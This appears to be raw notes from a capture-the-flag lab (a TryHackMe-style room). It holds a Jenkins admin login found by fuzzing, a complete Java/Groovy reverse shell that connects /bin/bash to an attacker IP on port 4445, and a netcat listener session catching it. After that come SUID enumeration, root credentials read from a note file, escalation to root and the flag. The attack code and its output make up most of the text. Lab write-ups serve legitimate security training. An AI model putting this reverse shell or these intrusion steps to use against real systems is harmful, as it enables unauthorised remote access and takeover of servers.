0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Dec 21 18:45:33 2021 from 10.8.28.133
aubreanna@internal:~$

> Visit 127.0.0.1:8080
> Fuzz for Jenkins admin login admin:spongebob

String host="10.8.28.133";
int port=4445;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();


┌──────────────────────────────────────────────────────────────┐
│   ______                          ____          _         __ │
│  / ____/_____ ___   ___   ____   / __ \ ____   (_)____   / /_│
│ / / __ / ___// _ \ / _ \ / __ \ / /_/ // __ \ / // __ \ / __/│
│/ /_/ // /   /  __//  __// / / // ____// /_/ // // / / // /_  │
│\____//_/    \___/ \___//_/ /_//_/     \____//_//_/ /_/ \__/  │
│                                                              │
└──────────────────────────────────────────────────────────────┘
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4445
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from 10.10.17.25.
Ncat: Connection from 10.10.17.25:51924.
whoami
jenkins
id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
pwd
/
ls -l
total 76
drwxr-xr-x   1 root root 4096 Aug  3  2020 bin
drwxr-xr-x   2 root root 4096 Sep  8  2019 boot
drwxr-xr-x   5 root root  340 Dec 21 18:24 dev
drwxr-xr-x   1 root root 4096 Aug  3  2020 etc
drwxr-xr-x   2 root root 4096 Sep  8  2019 home
drwxr-xr-x   1 root root 4096 Jan 30  2020 lib
drwxr-xr-x   2 root root 4096 Jan 30  2020 lib64
drwxr-xr-x   2 root root 4096 Jan 30  2020 media
drwxr-xr-x   2 root root 4096 Jan 30  2020 mnt
drwxr-xr-x   1 root root 4096 Aug  3  2020 opt
dr-xr-xr-x 184 root root    0 Dec 21 18:24 proc
drwx------   1 root root 4096 Aug  3  2020 root
drwxr-xr-x   3 root root 4096 Jan 30  2020 run
drwxr-xr-x   1 root root 4096 Jul 28  2020 sbin
drwxr-xr-x   2 root root 4096 Jan 30  2020 srv
dr-xr-xr-x  13 root root    0 Dec 21 18:42 sys
drwxrwxrwt   1 root root 4096 Dec 21 18:24 tmp
drwxr-xr-x   1 root root 4096 Jan 30  2020 usr
drwxr-xr-x   1 root root 4096 Jul 28  2020 var
sudo -l
/bin/bash: line 5: sudo: command not found
find / -type f -user root -perm -4000 2> /dev/null
/bin/mount
/bin/umount
/bin/ping
/bin/su
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
cd /opt
ls
note.txt
cat note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:tr0ub13guM!@#123


aubreanna@internal:~$ su root
Password: 
root@internal:/home/aubreanna# ls -l /root
total 8
-rw-r--r-- 1 root root   22 Aug  3  2020 root.txt
drwxr-xr-x 3 root root 4096 Aug  3  2020 snap
root@internal:/home/aubreanna# cat /root/root.txt
THM{d0ck3r_d3str0y3r}
root@internal:/home/aubreanna# 


